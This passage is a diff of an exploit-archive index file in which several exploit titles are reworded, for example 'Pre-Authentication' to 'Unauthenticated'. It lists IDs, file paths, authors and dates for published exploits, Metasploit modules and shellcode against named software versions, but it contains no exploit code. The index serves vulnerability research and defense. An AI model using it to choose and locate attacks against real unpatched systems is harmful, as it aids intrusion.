Overflow",2010-05-09,Metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 +16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U - Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,remote,0 -16781,platforms/windows/remote/16781.rb,"MailEnable - Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 +16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 16782,platforms/windows/remote/16782.rb,"Apache (Windows/x86) - (Windows/x86) Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows/x86) - URL Handling Buffer Overflow",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 -16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,cfm,webapps,0 -16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,multiple,remote,8080 +16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution",2010-11-24,Metasploit,cfm,webapps,0 +16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution",2010-11-24,Metasploit,multiple,remote,8080 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,Metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 @@ -14705,10 +14704,10 @@ id,file,description,date,author,platform,type,port 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 -16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 +16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution",2010-09-20,Metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 -16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 - tinybrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0 +16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution",2010-07-01,Metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 @@ -14761,7 +14760,7 @@ id,file,description,date,author,platform,type,port 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution",2011-03-08,Metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 -16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 +16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution",2011-03-11,Metasploit,unix,remote,8812 @@ -14779,7 +14778,7 @@ id,file,description,date,author,platform,type,port 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write",2011-03-14,Metasploit,windows,local,0 16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,windows,dos,0 -16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0 +16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Unauthenticated Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 @@ -14880,7 +14879,7 @@ id,file,description,date,author,platform,type,port 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17096,platforms/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 -17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Pre-Authentication kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 +17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - news.php 'id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 @@ -14952,13 +14951,13 @@ id,file,description,date,author,platform,type,port 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 -17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps,0 +17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS - Arbitrary File Upload",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 17183,platforms/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 -17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass)",2011-04-19,Abysssec,windows,remote,0 +17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0 @@ -15087,7 +15086,7 @@ id,file,description,date,author,platform,type,port 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 -17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2011-06-01,b33f,windows,remote,0 +17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 @@ -15101,7 +15100,7 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 +17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 @@ -15144,7 +15143,7 @@ id,file,description,date,author,platform,type,port 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 -17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 +17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 @@ -15423,7 +15422,7 @@ id,file,description,date,author,platform,type,port 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0 -17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0 +17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 @@ -15465,7 +15464,7 @@ id,file,description,date,author,platform,type,port 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (add admin)",2011-09-08,"red virus",php,webapps,0 17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbitrary File Upload (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 -17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 +17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0 @@ -15479,7 +15478,7 @@ id,file,description,date,author,platform,type,port 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos,0 17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0 -17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authentication Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 +17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0 @@ -15585,7 +15584,7 @@ id,file,description,date,author,platform,type,port 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0 17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 -17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass",2011-10-07,modpr0be,windows,local,0 +17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,Metasploit,linux,webapps,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0 @@ -15742,7 +15741,7 @@ id,file,description,date,author,platform,type,port 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 -18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0 +18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps,0 18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 @@ -15754,7 +15753,7 @@ id,file,description,date,author,platform,type,port 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit",2011-11-20,Metasploit,windows,remote,0 -18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit)",2011-11-21,hellok,win_x86,local,0 +18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,win_x86,local,0 18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 @@ -15949,7 +15948,7 @@ id,file,description,date,author,platform,type,port 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 -18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution",2012-01-20,Abysssec,windows,remote,0 +18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution",2012-01-20,Abysssec,windows,remote,0 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 @@ -16064,8 +16063,8 @@ id,file,description,date,author,platform,type,port 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 -18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 -18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 +18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 +18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 @@ -16196,7 +16195,7 @@ id,file,description,date,author,platform,type,port 18690,platforms/php/webapps/18690.txt,"BuddyPress plugin of WordPress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 -18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0 +18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0 @@ -16210,7 +16209,7 @@ id,file,description,date,author,platform,type,port 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0 18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 18723,platforms/multiple/remote/18723.rb,"Snort 2 - DCE/RPC Preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 -18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection",2012-04-09,Metasploit,php,webapps,0 +18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Authenticated OS Command Injection",2012-04-09,Metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,Metasploit,windows,remote,0 @@ -16222,7 +16221,7 @@ id,file,description,date,author,platform,type,port 18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects - Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 -18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execution",2012-04-14,Metasploit,php,remote,0 +18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution",2012-04-14,Metasploit,php,remote,0 18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"joomla Component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 @@ -16264,7 +16263,7 @@ id,file,description,date,author,platform,type,port 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 -18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 +18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Unauthenticated Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 @@ -16359,7 +16358,7 @@ 